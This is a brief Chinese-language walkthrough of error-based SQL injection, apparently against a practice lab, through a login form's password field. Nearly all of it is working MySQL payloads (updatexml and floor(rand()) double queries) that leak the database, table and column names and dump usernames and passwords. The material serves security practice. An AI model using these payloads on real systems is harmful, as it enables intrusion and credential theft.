0、初始网页
1、确定闭合字符
注入点在于password框,闭合字符为单引号
2、爆库名
1' and updatexml(1,concat(0x7e,database(),0x7e),1)#
1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))x from information_schema.tables group by x) as y) #
3、爆表名
1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x) as y) #
4、爆列名
1' and (select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x) as y) #
5、查询最终结果
1' and (select 1 from (select count(*),concat((select group_concat(username,0x3a,password) from users),floor(rand()*2))x from information_schema.tables group by x) as y) #